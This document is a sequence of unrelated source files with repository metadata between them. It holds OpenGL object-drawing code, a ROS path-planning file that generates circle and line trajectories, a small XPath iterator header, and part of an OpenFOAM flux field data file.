glDrawArrays(GL_TRIANGLES, 0, SizeOfDataBySection[i]); } if (DrawAnimMesh) { int a = 0; a++; } if (ExtraTextures.size() > 0) { Shader->ChooseTextureUnit(1, "extraSampler1"); Shader->ReleaseTextureUnit(); } glBindTexture(GL_TEXTURE_2D, 0); } } // modify destructor also when fbx is included GLObject::~GLObject() { if (Transform) delete Transform; if (Model) delete Model; for (size_t i = 0; i < Textures.size(); i++) { if(Textures[i] != NULL) delete Textures[i]; } Textures.clear(); for (size_t i = 0; i < ExtraTextures.size(); i++) { if (ExtraTextures[i] != NULL) delete ExtraTextures[i]; } ExtraTextures.clear(); deleteBuffers(); } // Drawing lines relies on scaling and VQS system only supports uniform scaling. // Therefore, it is not possible to use VQS for this process. // Matrices are used instead. void GLObject::DrawLine(glm::vec3 globalPosition1, glm::vec3 globalPosition2, glm::vec3 color, float width, glm::vec3 offset, bool pivotOnGameObject) { glBindVertexArray(lineVAO); glEnable(GL_DEPTH_TEST); int programID; glGetIntegerv(GL_CURRENT_PROGRAM, &programID); int isLine = 1; GLint isLineLoc = glGetUniformLocation(programID, "IsLine"); glUniform1i(isLineLoc, isLine); GLint colorLoc = glGetUniformLocation(programID, "LineColor"); glUniform3fv(colorLoc, 1, &color[0]); Camera3D* currentCamera = renderManager->GetRender3D()->CurrentCamera; GLint proj = glGetUniformLocation(programID, "Projection"); glUniformMatrix4fv(proj, 1, GL_FALSE, &currentCamera->Projection[0][0]); GLint view = glGetUniformLocation(programID, "View"); glUniformMatrix4fv(view, 1, GL_FALSE, &currentCamera->View[0][0]); // 1. Find vector between child and parent // 2. NON-UNIFORM Scale to the parent's postion // 3. Translate to child position. // 4. Apply a transformation matrix and... Ta da!! :D glm::vec3 Vn; Vn = globalPosition1 - globalPosition2; glLineWidth(width); glm::mat4 S; glm::mat4 T; if (pivotOnGameObject) { S = glm::scale(glm::mat4(1.0f), Vn); T = glm::translate(glm::mat4(1.0f), Transform->Position + offset); } else { S = glm::scale(glm::mat4(1.0f), Vn/**2.0f*/); T = glm::translate(glm::mat4(1.0f), globalPosition1); } GLint lineWorldLoc = glGetUniformLocation(programID, "LineT"); glUniformMatrix4fv(lineWorldLoc, 1, GL_FALSE, &T[0][0]); lineWorldLoc = glGetUniformLocation(programID, "LineS"); glUniformMatrix4fv(lineWorldLoc, 1, GL_FALSE, &S[0][0]); glDrawArrays(GL_LINES, 0, 2); glDisable(GL_DEPTH_TEST); glBindVertexArray(0); } void GLObject::DrawDot(glm::vec3 globalPosition1) { glBindVertexArray(dotVAO); glEnable(GL_DEPTH_TEST); int programID; glGetIntegerv(GL_CURRENT_PROGRAM, &programID); int isDot = 1; GLint isdotLoc = glGetUniformLocation(programID, "IsDot"); glUniform1i(isdotLoc, isDot); Camera3D* currentCamera = renderManager->GetRender3D()->CurrentCamera; GLint proj = glGetUniformLocation(programID, "Projection"); glUniformMatrix4fv(proj, 1, GL_FALSE, &currentCamera->Projection[0][0]); GLint view = glGetUniformLocation(programID, "View"); glUniformMatrix4fv(view, 1, GL_FALSE, &currentCamera->View[0][0]); glm::mat4 T; T = glm::translate(glm::mat4(1.0f), globalPosition1); glm::mat4 dotTransform = T; GLint lineWorldLoc = glGetUniformLocation(programID, "ModelMatrix"); glUniformMatrix4fv(lineWorldLoc, 1, GL_FALSE, &dotTransform[0][0]); glPointSize(10.0f); glDrawArrays(GL_POINTS, 0, 1); glDisable(GL_DEPTH_TEST); glBindVertexArray(0); } void GLObject::ResetLineBuffers() { glDeleteVertexArrays(1, &lineVAO); glDeleteBuffers(1, &lineVBO); glGenVertexArrays(1, &lineVAO); glGenBuffers(1, &lineVBO); fillLineBuffers(); // /*glDeleteVertexArrays(1, &dotVAO); glDeleteBuffers(1, &dotVBO);*/ }
40bf3a31f8f96ded91e7e23a949f13ff4c63a8da
cd2097370cf9f4c4d1febbb06af37cf528736633
/src/path.cpp
a0be3cb82f48add5ed83786ceb056ae7d55aaaaa
[ "MIT" ]
permissive
oriolorra/p3_uvic
0d22a72e80b13e4dcaa1d53af1ae03c80d88ed65
e6d71adddad79d1f5898f488c9e18f1aadec89e0
refs/heads/master
2021-01-19T21:47:55.564983
2017-11-08T13:08:59
2017-11-08T13:08:59
88,708,398
0
0
null
null
null
null
UTF-8
C++
false
false
10,363
cpp
path.cpp
#include "path.h" #define PI 3.14159265 Path::Path(){} Path::~Path(){} // x = cx + r * cos(a) // z = cz + r * sin(a) bool Path::getCircleTrajectoryXZBase(const geometry_msgs::Pose& startingPose, const double radius, const double startingAngleDeg, const double endAngleDeg, const double stepDeg, const int clockwise, std::vector<geometry_msgs::Pose> &waypoints){ double steps = (endAngleDeg-startingAngleDeg)/stepDeg; double originX = startingPose.position.x; double originY = startingPose.position.y; double originZ = startingPose.position.z; double angle = startingAngleDeg; double cx = originX - radius*cos(angle * PI/180); double cz = originZ - radius*sin(angle * PI/180); //check if steps has decimals double intpart; if( modf( steps, &intpart) != 0 ) return false; for(int i = 0; i <= steps; i++){ geometry_msgs::Pose target_pose; target_pose.position.x = cx + radius * cos(angle * PI/180 * clockwise); target_pose.position.y = originY; target_pose.position.z = cz + radius * sin(angle * PI/180 * clockwise); target_pose.orientation.x = startingPose.orientation.x; target_pose.orientation.y = startingPose.orientation.y; target_pose.orientation.z = startingPose.orientation.z; target_pose.orientation.w = startingPose.orientation.w; waypoints.push_back(target_pose); if(angle >= endAngleDeg) break; angle += stepDeg; } return true; } // x = cx + r * cos(a) // y = cy + r * sin(a) bool Path::getCircleTrajectoryXYBase(const geometry_msgs::Pose &startingPose, const double radius, const double startingAngleDeg, const double endAngleDeg, const double stepDeg, const int clockwise, std::vector<geometry_msgs::Pose> &waypoints){ double steps = (endAngleDeg-startingAngleDeg)/stepDeg; double originX = startingPose.position.x; double originY = startingPose.position.y; double originZ = startingPose.position.z; double angle = startingAngleDeg; double cx = originX - radius*cos(angle * PI/180); double cy = originY - radius*sin(angle * PI/180); //check if steps has decimals double intpart; if( modf( steps, &intpart) != 0 ) return false; for(int i = 0; i <= steps; i++){ geometry_msgs::Pose target_pose; target_pose.position.x = cx + radius * cos(angle * PI/180 * clockwise); target_pose.position.y = cy + radius * sin(angle * PI/180 * clockwise); target_pose.position.z = originZ; target_pose.orientation.x = startingPose.orientation.x; target_pose.orientation.y = startingPose.orientation.y; target_pose.orientation.z = startingPose.orientation.z; target_pose.orientation.w = startingPose.orientation.w; waypoints.push_back(target_pose); if(angle >= endAngleDeg) break; angle += stepDeg; } return true; } // z = cz + r * cos(a) -> cz // y = cy + r * sin(a) bool Path::getCircleTrajectoryYZBase(const geometry_msgs::Pose &startingPose, const double radius, const double startingAngleDeg, const double endAngleDeg, const double stepDeg, const int clockwise, std::vector<geometry_msgs::Pose> &waypoints){ double steps = (endAngleDeg-startingAngleDeg)/stepDeg; double originX = startingPose.position.x; double originY = startingPose.position.y; double originZ = startingPose.position.z; double angle = startingAngleDeg; double cy = originY - radius*cos(angle * PI/180); double cz = originZ - radius*sin(angle * PI/180); //check if steps has decimals double intpart; if( modf( steps, &intpart) != 0 ) return false; for(int i = 0; i <= steps; i++){ geometry_msgs::Pose target_pose; target_pose.position.x = originX; target_pose.position.y = cy + radius * cos(angle * PI/180 * clockwise); target_pose.position.z = cz + radius * sin(angle * PI/180 * clockwise); target_pose.orientation.x = startingPose.orientation.x; target_pose.orientation.y = startingPose.orientation.y; target_pose.orientation.z = startingPose.orientation.z; target_pose.orientation.w = startingPose.orientation.w; waypoints.push_back(target_pose); if(angle >= endAngleDeg) break; angle += stepDeg; } return true; } // x = cx + r * cos(alpha) sin(yaw) * sin(pitch) // y = cy + r * cos(alpha) * cos(yaw) // z = cz + r * sin(alpha) * cos(pitch) bool Path::getCircleTrajectoryEEPlane(const geometry_msgs::Pose &startingPose, const double radius, const double startingAngleDeg, const double endAngleDeg, const double stepDeg, const int clockwise, std::vector<geometry_msgs::Pose> &waypoints){ double steps = (endAngleDeg-startingAngleDeg)/stepDeg; double angle = startingAngleDeg; //center of circle from end effector Eigen::Vector3d center(0.0, - radius * cos(angle * PI/180), - radius * sin(angle * PI/180)); //Getting orientation end effector Eigen::Matrix3d R = Eigen::Quaterniond(startingPose.orientation.w, startingPose.orientation.x, startingPose.orientation.y, startingPose.orientation.z).toRotationMatrix(); //check if steps has decimals double intpart; if( modf( steps, &intpart) != 0 ) return false; Eigen::Vector3d startingPoseBase(startingPose.position.x, startingPose.position.y, startingPose.position.z); for(int i = 0; i <= steps; i++){ Eigen::Vector3d pointEE(center(0), center(1) + radius * cos(angle * PI/180 * clockwise), center(2) + radius * sin(angle * PI/180 * clockwise)); Eigen::Vector3d pointBase = R*pointEE + startingPoseBase; geometry_msgs::Pose target_pose; target_pose.position.x = pointBase(0); target_pose.position.y = pointBase(1); target_pose.position.z = pointBase(2); target_pose.orientation.x = startingPose.orientation.x; target_pose.orientation.y = startingPose.orientation.y; target_pose.orientation.z = startingPose.orientation.z; target_pose.orientation.w = startingPose.orientation.w; waypoints.push_back(target_pose); if(angle >= endAngleDeg) break; angle += stepDeg; } return true; } bool Path::getLineTrajectoryXBase(const geometry_msgs::Pose &startingPose, const double distance, const int direction, const double step, std::vector<geometry_msgs::Pose> &waypoints){ double steps = distance/step; double originX = startingPose.position.x; double originY = startingPose.position.y; double originZ = startingPose.position.z; //check if steps has decimals double intpart; if( modf( steps, &intpart) != 0 ) return false; for(int i = 0; i <= steps; i++){ geometry_msgs::Pose target_pose; target_pose.position.x = originX + (step * i * direction); target_pose.position.y = originY; target_pose.position.z = originZ; target_pose.orientation.x = startingPose.orientation.x; target_pose.orientation.y = startingPose.orientation.y; target_pose.orientation.z = startingPose.orientation.z; target_pose.orientation.w = startingPose.orientation.w; waypoints.push_back(target_pose); } return true; } bool Path::getLineTrajectoryYBase(const geometry_msgs::Pose &startingPose, const double distance, const int direction, const double step, std::vector<geometry_msgs::Pose> &waypoints){ double steps = distance/step; double originX = startingPose.position.x; double originY = startingPose.position.y; double originZ = startingPose.position.z; //check if steps has decimals double intpart; if( modf( steps, &intpart) != 0 ) return false; for(int i = 0; i <= steps; i++){ geometry_msgs::Pose target_pose; target_pose.position.x = originX; target_pose.position.y = originY + (step * i * direction); target_pose.position.z = originZ; target_pose.orientation.x = startingPose.orientation.x; target_pose.orientation.y = startingPose.orientation.y; target_pose.orientation.z = startingPose.orientation.z; target_pose.orientation.w = startingPose.orientation.w; waypoints.push_back(target_pose); } return true; } bool Path::getLineTrajectoryZBase(const geometry_msgs::Pose &startingPose, const double distance, const int direction, const double step, std::vector<geometry_msgs::Pose> &waypoints){ double steps = distance/step; double originX = startingPose.position.x; double originY = startingPose.position.y; double originZ = startingPose.position.z; //Getting orientation end effector Eigen::Matrix3d R = Eigen::Quaterniond(startingPose.orientation.w, startingPose.orientation.x, startingPose.orientation.y, startingPose.orientation.z).toRotationMatrix(); //check if steps has decimals double intpart; if( modf( steps, &intpart) != 0 ) return false; for(int i = 0; i <= steps; i++){ geometry_msgs::Pose target_pose; target_pose.position.x = originX; target_pose.position.y = originY; target_pose.position.z = originZ + (step * i * direction); target_pose.orientation.x = startingPose.orientation.x; target_pose.orientation.y = startingPose.orientation.y; target_pose.orientation.z = startingPose.orientation.z; target_pose.orientation.w = startingPose.orientation.w; waypoints.push_back(target_pose); } return true; } bool Path::getLineTrajectoryEEPlane(const geometry_msgs::Pose &startingPose, const double distance, const int direction, const double step, std::vector<geometry_msgs::Pose> &waypoints){ double steps = distance/step; //Getting orientation end effector Eigen::Matrix3d R = Eigen::Quaterniond(startingPose.orientation.w, startingPose.orientation.x, startingPose.orientation.y, startingPose.orientation.z).toRotationMatrix(); Eigen::Vector3d startingPoseBase(startingPose.position.x, startingPose.position.y, startingPose.position.z); //check if steps has decimals double intpart; if( modf( steps, &intpart) != 0 ) return false; for(int i = 0; i <= steps; i++){ Eigen::Vector3d pointEE(0.0, 0.0, step * i * direction); Eigen::Vector3d pointBase = R*pointEE + startingPoseBase; geometry_msgs::Pose target_pose; target_pose.position.x = pointBase(0); target_pose.position.y = pointBase(1); target_pose.position.z = pointBase(2); target_pose.orientation.x = startingPose.orientation.x; target_pose.orientation.y = startingPose.orientation.y; target_pose.orientation.z = startingPose.orientation.z; target_pose.orientation.w = startingPose.orientation.w; waypoints.push_back(target_pose); } return true; }
10597d2c21e9d616510bb3e9a0aea7404f699610
cc7661edca4d5fb2fc226bd6605a533f50a2fb63
/System.Xml/NullIterator.h
48ce3c376ed59ee271d4d89ec0fef742c8b3a0df
[ "MIT" ]
permissive
g91/Rust-C-SDK
698e5b573285d5793250099b59f5453c3c4599eb
d1cce1133191263cba5583c43a8d42d8d65c21b0
refs/heads/master
2020-03-27T05:49:01.747456
2017-08-23T09:07:35
2017-08-23T09:07:35
146,053,940
1
0
null
2018-08-25T01:13:44
2018-08-25T01:13:44
null
UTF-8
C++
false
false
155
h
NullIterator.h
#pragma once namespace System { namespace Xml { { namespace XPath { class NullIterator : public SelfIterator // 0x40 { public: }; // size = 0x40 }
e558832ea81df275b979dea67f97ba0ba83b3a29
f81124e4a52878ceeb3e4b85afca44431ce68af2
/re20_3/processor17/35/phi
fe5fd4760a1a8640541c98365f700754f20fb703
[]
no_license
chaseguy15/coe-of2
7f47a72987638e60fd7491ee1310ee6a153a5c10
dc09e8d5f172489eaa32610e08e1ee7fc665068c
refs/heads/master
2023-03-29T16:59:14.421456
2021-04-06T23:26:52
2021-04-06T23:26:52
355,040,336
0
1
null
null
null
null
UTF-8
C++
false
false
25,995
phi
/*--------------------------------*- C++ -*----------------------------------*\ ========= | \\ / F ield | OpenFOAM: The Open Source CFD Toolbox \\ / O peration | Website: https://openfoam.org \\ / A nd | Version: 7 \\/ M anipulation | \*---------------------------------------------------------------------------*/ FoamFile { version 2.0; format ascii; class surfaceScalarField; location "35"; object phi; } // * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * // dimensions [0 3 -1 0 0 0 0]; internalField nonuniform List<scalar> 1649 ( -5.52237e-05 4.53132e-06 -1.0458e-11 -5.97551e-05 4.53136e-06 -1.16455e-11 -6.42615e-05 4.50644e-06 -1.2932e-11 -6.87216e-05 4.4601e-06 -1.43253e-11 -7.31185e-05 4.39696e-06 -1.58363e-11 -7.74412e-05 4.32274e-06 -1.74727e-11 4.24423e-06 -1.92474e-11 -5.43625e-05 8.95179e-06 -5.87714e-05 8.94028e-06 -6.31428e-05 8.87789e-06 -6.74544e-05 8.7717e-06 -7.16884e-05 8.63092e-06 -7.58327e-05 8.467e-06 8.29357e-06 -5.26439e-05 1.31511e-05 -5.68084e-05 1.31048e-05 -6.09105e-05 1.298e-05 -6.49257e-05 1.27869e-05 -6.88343e-05 1.25395e-05 -7.26223e-05 1.2255e-05 -7.62825e-05 1.19538e-05 1.16596e-05 -5.00757e-05 1.70197e-05 -5.3875e-05 1.69041e-05 -5.75744e-05 1.66793e-05 -6.11465e-05 1.6359e-05 -6.45685e-05 1.59616e-05 -6.78235e-05 1.55099e-05 -7.09015e-05 1.50318e-05 1.4559e-05 -4.66694e-05 2.04498e-05 -4.99841e-05 2.02188e-05 -5.3149e-05 1.98442e-05 -5.61329e-05 1.93429e-05 -5.89089e-05 1.87376e-05 -6.14561e-05 1.80572e-05 -6.37607e-05 1.73364e-05 1.66159e-05 -4.24396e-05 2.3335e-05 -4.51522e-05 2.29314e-05 -4.76531e-05 2.23451e-05 -4.9906e-05 2.15958e-05 -5.1879e-05 2.07106e-05 -5.3546e-05 1.97242e-05 -5.48885e-05 1.86788e-05 1.76243e-05 -3.7404e-05 2.55714e-05 -3.93996e-05 2.4927e-05 -4.11095e-05 2.4055e-05 -4.24914e-05 2.29777e-05 -4.35072e-05 2.17265e-05 -4.41246e-05 2.03416e-05 -4.43192e-05 1.88733e-05 1.73812e-05 -3.15827e-05 -3.27492e-05 2.60935e-05 -3.35442e-05 2.485e-05 -3.39185e-05 2.3352e-05 -3.38264e-05 2.16344e-05 -3.32284e-05 1.97436e-05 -3.20928e-05 1.77377e-05 1.56869e-05 -2.52262e-05 2.63221e-05 -2.49861e-05 2.461e-05 -2.42198e-05 2.25857e-05 -2.28732e-05 2.02878e-05 -2.08981e-05 1.77684e-05 -1.82544e-05 1.50941e-05 1.23462e-05 -1.68574e-05 2.55075e-05 -1.54659e-05 2.32185e-05 -1.34306e-05 2.05503e-05 -1.06874e-05 1.75447e-05 -7.17836e-06 1.42594e-05 -2.85374e-06 1.07695e-05 2.32375e-06 7.16869e-06 3.56717e-06 -7.67065e-06 -5.01569e-06 2.05635e-05 -1.58741e-06 1.7122e-05 2.68917e-06 1.32681e-05 7.88373e-06 9.0648e-06 1.4057e-05 4.59616e-06 2.12566e-05 -3.09051e-08 -4.68811e-06 6.33233e-06 1.65377e-05 1.12721e-05 1.21822e-05 1.72135e-05 7.32677e-06 2.4239e-05 2.03925e-06 3.24225e-05 -3.58729e-06 4.18233e-05 -9.43176e-06 -1.53456e-05 1.85464e-05 1.10386e-05 2.51108e-05 5.61779e-06 3.28421e-05 -4.04458e-07 4.18374e-05 -6.95613e-06 5.21854e-05 -1.39353e-05 6.39595e-05 -2.12058e-05 -2.85966e-05 3.15964e-05 3.98928e-05 -2.67856e-06 4.95324e-05 -1.00441e-05 6.06291e-05 -1.80529e-05 7.32883e-05 -2.65945e-05 8.75995e-05 -3.5517e-05 0.000103627 -4.46242e-05 -5.36864e-05 5.55844e-05 -1.28081e-05 6.7244e-05 -2.17037e-05 8.05658e-05 -3.13746e-05 9.56742e-05 -4.17029e-05 0.000112678 -5.25205e-05 0.000131656 -6.3603e-05 -7.46796e-05 7.21558e-05 8.59396e-05 -3.54876e-05 0.000101602 -4.70366e-05 0.000119288 -5.93895e-05 0.00013913 -7.23623e-05 0.000161228 -8.57005e-05 0.000185634 -9.90859e-05 -0.000112117 0.000105586 -5.14926e-05 0.000123695 -6.51451e-05 0.000144078 -7.97727e-05 0.000166893 -9.51768e-05 0.000192264 -0.000111072 0.000220264 -0.000127086 -0.000142738 0.000126157 0.000146809 -8.57968e-05 0.000169995 -0.000102959 0.000195904 -0.000121085 0.00022469 -0.000139859 0.000256453 -0.000158849 -0.000177477 0.000170913 -0.000109079 0.000196998 -0.000129043 0.000226106 -0.000150194 0.000258434 -0.000172186 0.000294112 -0.000194527 0.000333161 -0.000216526 -0.000236987 0.000195988 0.000225051 -0.000158107 0.000257451 -0.000182593 0.000293426 -0.000208161 0.000333155 -0.000234256 0.000376691 -0.000260063 -0.000284142 0.000254134 -0.00019022 0.000289895 -0.000218355 0.000329602 -0.000247868 0.000373496 -0.00027815 0.000421681 -0.000308248 -0.000336434 0.000473973 0.000284235 0.000323413 -0.000257533 0.000366911 -0.000291366 0.000415054 -0.000326292 0.000468027 -0.000361221 -0.000394084 0.000525677 0.000357997 0.000405318 -0.000338687 0.000457756 -0.000378731 0.000515625 -0.000419091 -0.000457308 0.000578849 0.000444815 -0.000389836 0.000501553 -0.000435469 0.00056438 -0.000481917 -0.000526313 0.000633385 0.000485444 0.000546439 -0.000496464 0.000614218 -0.000549696 -0.000601286 0.000689191 0.000592495 0.00066513 -0.000622332 -0.000682358 0.000746202 0.000717247 -0.000769556 0.000804445 0.0008643 0.000769556 0.0008643 0.000717247 0.000622332 0.000682358 0.000804445 0.000592495 0.000496464 0.00066513 0.000549696 0.000601286 0.000746202 0.000485444 0.000389836 0.000546439 0.000435469 0.000614218 0.000481917 0.000526313 0.000689191 0.000444815 0.000338687 0.000501553 0.000378731 0.00056438 0.000419091 0.000457308 0.000633385 0.000357997 0.000257533 0.000405318 0.000291366 0.000457756 0.000326293 0.000515625 0.000361221 0.000394084 0.000578849 0.000284235 0.00019022 0.000323413 0.000218355 0.000366911 0.000247868 0.000415054 0.00027815 0.000468027 0.000308248 0.000336434 0.000525677 0.000254134 0.000158107 0.000289895 0.000182593 0.000329602 0.000208161 0.000373496 0.000234256 0.000421681 0.000260063 0.000284142 0.000473973 0.000195988 0.000109079 0.000225051 0.000129043 0.000257451 0.000150194 0.000293426 0.000172186 0.000333155 0.000194527 0.000376691 0.000216526 0.000236987 0.000170913 8.57968e-05 0.000196998 0.000102959 0.000226106 0.000121085 0.000258434 0.000139859 0.000294112 0.000158849 0.000333161 0.000177477 0.000126157 5.14926e-05 0.000146809 6.51451e-05 0.000169995 7.97727e-05 0.000195904 9.51768e-05 0.00022469 0.000111072 0.000256453 0.000127086 0.000142738 0.000105586 3.54876e-05 0.000123695 4.70366e-05 0.000144078 5.93896e-05 0.000166893 7.23623e-05 0.000192264 8.57005e-05 0.000220264 9.90859e-05 0.000112117 7.21558e-05 1.28082e-05 8.59396e-05 2.17037e-05 0.000101602 3.13746e-05 0.000119288 4.17029e-05 0.00013913 5.25205e-05 0.000161228 6.36031e-05 0.000185634 7.46796e-05 5.55844e-05 2.67858e-06 6.7244e-05 1.00441e-05 8.05657e-05 1.80529e-05 9.56742e-05 2.65945e-05 0.000112678 3.5517e-05 0.000131656 4.46242e-05 5.36864e-05 3.15964e-05 -1.10386e-05 3.98928e-05 -5.61777e-06 4.95324e-05 4.04483e-07 6.06291e-05 6.95616e-06 7.32883e-05 1.39353e-05 8.75995e-05 2.12059e-05 0.000103627 2.85966e-05 1.85464e-05 -1.65377e-05 2.51108e-05 -1.21822e-05 3.28421e-05 -7.32675e-06 4.18374e-05 -2.03922e-06 5.21854e-05 3.58732e-06 6.39595e-05 9.4318e-06 1.53457e-05 6.33232e-06 -2.05635e-05 1.12721e-05 -1.7122e-05 1.72135e-05 -1.32681e-05 2.4239e-05 -9.06477e-06 3.24225e-05 -4.59613e-06 4.18233e-05 3.09405e-08 4.68815e-06 -7.67065e-06 -2.55075e-05 -5.01569e-06 -2.32184e-05 -1.58742e-06 -2.05503e-05 2.68916e-06 -1.75447e-05 7.88372e-06 -1.42593e-05 1.4057e-05 -1.07694e-05 2.12566e-05 -7.16865e-06 -3.56713e-06 -1.68575e-05 -2.63221e-05 -1.54659e-05 -2.46099e-05 -1.34306e-05 -2.25857e-05 -1.06874e-05 -2.02878e-05 -7.17837e-06 -1.77684e-05 -2.85374e-06 -1.5094e-05 2.32374e-06 -1.23461e-05 -2.52262e-05 -2.60935e-05 -2.49861e-05 -2.485e-05 -2.42198e-05 -2.33519e-05 -2.28732e-05 -2.16344e-05 -2.08981e-05 -1.97436e-05 -1.82544e-05 -1.77377e-05 -1.56869e-05 -3.15827e-05 -2.55714e-05 -3.27492e-05 -2.4927e-05 -3.35442e-05 -2.40549e-05 -3.39185e-05 -2.29777e-05 -3.38264e-05 -2.17264e-05 -3.32284e-05 -2.03416e-05 -3.20928e-05 -1.88733e-05 -1.73811e-05 -3.7404e-05 -2.33349e-05 -3.93996e-05 -2.29314e-05 -4.11095e-05 -2.23451e-05 -4.24914e-05 -2.15958e-05 -4.35072e-05 -2.07106e-05 -4.41247e-05 -1.97242e-05 -4.43192e-05 -1.86788e-05 -1.76242e-05 -4.24396e-05 -2.04497e-05 -4.51522e-05 -2.02188e-05 -4.76531e-05 -1.98442e-05 -4.9906e-05 -1.93429e-05 -5.1879e-05 -1.87376e-05 -5.3546e-05 -1.80571e-05 -5.48885e-05 -1.73363e-05 -1.66158e-05 -4.66694e-05 -1.70197e-05 -4.99841e-05 -1.69041e-05 -5.3149e-05 -1.66793e-05 -5.61329e-05 -1.6359e-05 -5.89089e-05 -1.59615e-05 -6.14561e-05 -1.55099e-05 -6.37607e-05 -1.50317e-05 -1.45589e-05 -5.00757e-05 -1.3151e-05 -5.3875e-05 -1.31048e-05 -5.75744e-05 -1.29799e-05 -6.11465e-05 -1.27869e-05 -6.45685e-05 -1.25395e-05 -6.78235e-05 -1.22549e-05 -7.09015e-05 -1.19537e-05 -1.16596e-05 -5.26439e-05 -8.95177e-06 -5.68084e-05 -8.94025e-06 -6.09105e-05 -8.87787e-06 -6.49257e-05 -8.77167e-06 -6.88343e-05 -8.63089e-06 -7.26223e-05 -8.46697e-06 -7.62825e-05 -8.29353e-06 -5.43625e-05 -4.5313e-06 -5.87714e-05 -4.53134e-06 -6.31428e-05 -4.50641e-06 -6.74544e-05 -4.46007e-06 -7.16884e-05 -4.39693e-06 -7.58327e-05 -4.32271e-06 -4.24419e-06 -5.52237e-05 -5.97551e-05 -6.42615e-05 -6.87216e-05 -7.31185e-05 -7.74412e-05 -2.69142e-05 -3.15375e-05 -3.6207e-05 0.0006381 -4.09222e-05 -6.47878e-05 0.000694006 -4.57374e-05 -7.19668e-05 0.000751263 -5.07988e-05 0.000758835 -7.95387e-05 -0.000104421 0.000810016 -5.63691e-05 0.000818064 -8.75866e-05 -0.000112176 0.000870666 -6.27348e-05 0.000879141 -9.60624e-05 -0.000119014 0.000934588 -7.04286e-05 0.000942993 -0.000104467 0.000947753 -0.000123774 -0.000137195 0.00100548 -8.26499e-05 0.0010112 -0.000110191 0.00101124 -0.000123811 -0.000135463 0.0035644 -5.43163e-05 0.00353789 -8.36792e-05 0.00351836 -0.000104281 0.00350275 -0.000119858 -0.000133508 0.00412924 -2.41308e-05 0.00409174 -4.61808e-05 0.00405552 -6.80637e-05 0.00402288 -8.72194e-05 -0.000104177 0.0046307 1.34847e-05 0.00459029 -5.76737e-06 0.00454933 -2.71071e-05 0.00450968 -4.75679e-05 -6.65737e-05 0.00508329 5.60122e-05 0.00504035 3.71768e-05 0.00499727 1.59714e-05 0.00495479 -5.0897e-06 -2.52695e-05 0.00548707 0.000101435 0.00544257 8.16736e-05 0.00539859 5.99586e-05 0.00535522 3.82768e-05 1.72485e-05 0.00584122 0.000147489 0.00579659 0.000126302 0.00575285 0.000103692 0.00570988 8.1256e-05 5.94686e-05 0.00614538 0.000192124 0.00610219 0.000169492 0.00605997 0.00014592 0.0060185 0.000122718 0.000100245 0.00640052 0.00636019 0.000209828 0.00632065 0.000185457 0.00628174 0.000161623 0.000138603 0.00657258 0.000246195 0.00653672 0.000221318 0.00650125 0.000197092 0.000173735 0.00674253 0.000277836 0.00671105 0.0002528 0.00667967 0.000228473 0.000205028 0.0068741 0.000304357 0.00684739 0.000279502 0.00682049 0.000255372 0.0002321 0.00697188 0.000325678 0.00695007 0.000301312 0.00692779 0.000277649 0.000254791 0.00704074 0.000341982 0.0070237 0.000318355 0.00700596 0.000295384 0.000273147 0.00708549 0.00035364 0.0070729 0.000330938 0.00705946 0.000308831 0.000287377 0.00711066 0.000361141 0.0071021 0.00033949 0.00709257 0.000318365 0.00029781 0.00712034 0.000365035 0.00711532 0.000344508 0.00710925 0.000324434 0.000304848 0.0071181 0.000365884 0.0071161 0.000346505 0.00711302 0.000327512 0.000308929 0.00710694 0.00036422 0.00710746 0.000345982 0.00710691 0.000328066 0.000310491 0.00708932 0.000360529 0.0070919 0.000343399 0.00709344 0.000326533 0.000309947 0.0070672 0.000355235 0.00707144 0.000339163 0.00707467 0.000323306 0.000307676 0.0070421 0.000348696 0.00704764 0.000333624 0.00705222 0.000318724 0.000304007 0.00701516 0.000341207 0.00702172 0.000327073 0.00702736 0.000313076 0.000299223 0.00698725 0.000333005 0.00699458 0.000319748 0.00700105 0.000306597 0.000293558 0.00695898 0.000324279 0.00696689 0.000311839 0.006974 0.000299479 0.000287206 0.00693079 0.000315176 0.00693913 0.000303497 0.00694673 0.000291876 0.000280321 0.00690298 0.000305807 0.00691164 0.000294837 0.00691961 0.000283908 0.000273027 0.00687577 0.000296259 0.00688466 0.000285951 0.0068929 0.000275669 0.00026542 0.0068493 0.000286598 0.00685834 0.000276909 0.00686678 0.000267233 0.000257578 0.00682365 0.000276874 0.0068328 0.000267763 0.00684137 0.000258658 0.000249561 0.00679888 0.000267124 0.00680809 0.000258556 0.00681676 0.000249986 0.000241417 0.00677502 0.000257376 0.00678425 0.000249319 0.00679299 0.000241253 0.000233181 0.00675208 0.000247653 0.00676132 0.000240077 0.00677009 0.000232486 0.000224884 0.00673006 0.000237969 0.00673929 0.000230847 0.00674807 0.000223706 0.000216549 0.00670898 0.000228338 0.00671818 0.000221644 0.00672696 0.000214928 0.000208194 0.00668881 0.000218767 0.00669797 0.000212479 0.00670673 0.000206167 0.000199833 0.00666954 0.000209264 0.00667866 0.000203361 0.0066874 0.000197432 0.000191479 0.00665118 0.000199833 0.00666024 0.000194295 0.00666894 0.00018873 0.00018314 0.00663369 0.000190476 0.0066427 0.000185286 0.00665136 0.000180068 0.000174823 0.00661707 0.000181195 0.00662602 0.000176337 0.00663464 0.000171449 0.000166535 0.0066013 0.000171991 0.00661019 0.000167449 0.00661876 0.000162877 0.000158279 0.00658637 0.000162863 0.0065952 0.000158622 0.00660372 0.000154353 0.000150057 0.00657227 0.00015381 0.00658104 0.000149858 0.00658951 0.000145879 0.000141873 0.00655899 0.000144829 0.00656769 0.000141155 0.00657611 0.000137455 0.000133728 0.0065465 0.000135919 0.00655514 0.000132512 0.00656352 0.000129079 0.000125621 0.00653481 0.000127078 0.00654339 0.000123927 0.00655172 0.000120752 0.000117552 0.00652389 0.000118301 0.00653242 0.000115398 0.0065407 0.000112472 0.000109522 0.00651375 0.000109585 0.00652222 0.000106922 0.00653046 0.000104237 0.000101529 0.00650436 0.000100928 0.00651279 9.84965e-05 0.00652098 9.60442e-05 9.35714e-05 0.00649573 9.2324e-05 0.00650411 9.01179e-05 0.00651226 8.78922e-05 8.56474e-05 0.00648784 8.377e-05 0.00649618 8.17828e-05 0.00650429 7.97776e-05 7.7755e-05 0.0064807 7.52613e-05 0.00648899 7.34876e-05 0.00649707 7.16976e-05 6.98918e-05 0.00647428 6.67935e-05 0.00648254 6.52285e-05 0.00649059 6.36489e-05 6.20551e-05 0.00646859 5.83619e-05 0.00647681 5.70013e-05 0.00648484 5.5628e-05 5.42422e-05 0.00646362 4.99618e-05 0.00647182 4.88021e-05 0.00647982 4.76315e-05 